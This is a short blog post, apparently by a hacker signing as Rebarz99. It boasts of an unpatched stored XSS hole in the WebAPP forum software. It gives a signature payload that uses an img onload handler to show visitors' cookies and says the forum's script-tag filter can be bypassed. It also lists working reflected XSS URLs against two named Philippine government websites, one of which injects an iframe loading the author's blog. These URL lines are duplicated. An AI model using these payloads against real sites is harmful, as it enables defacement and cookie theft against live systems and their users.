I just revisted the WebAPP site. They've patched the flaws that were present last time. Although they missed a XSS hole. Basically registered users can put something like this " <img src="http://www.web-app.org/images/forum/smilies/grin.gif" onload='alert("Rebarz99 got your cookies"+document.cookie)'> " as their signature in their profile. When they post a comment in any of the forums, anyone who views the comments will have their cookies pop up. Webapp filters <script> tags but this kind of filtering can be bypassed. I haven't examined the latest version they've put out. Some vulnerabilities may still be left. :P
Misc: http://www.dilg.gov.ph/index.cfm?fuseaction=<script>alert('Eat_my_fucking_shorts!')</script>
http://www.ncc.gov.ph/announcements.php?seq=235'<iframe%20width="100%"%20height=100%"%20src=http://rebarz99.blogspot.com/>
Misc: http://www.dilg.gov.ph/index.cfm?fuseaction=<script>alert('Eat_my_fucking_shorts!')</script>
http://www.ncc.gov.ph/announcements.php?seq=235'<iframe%20width="100%"%20height=100%"%20src=http://rebarz99.blogspot.com/>
No comments:
Post a Comment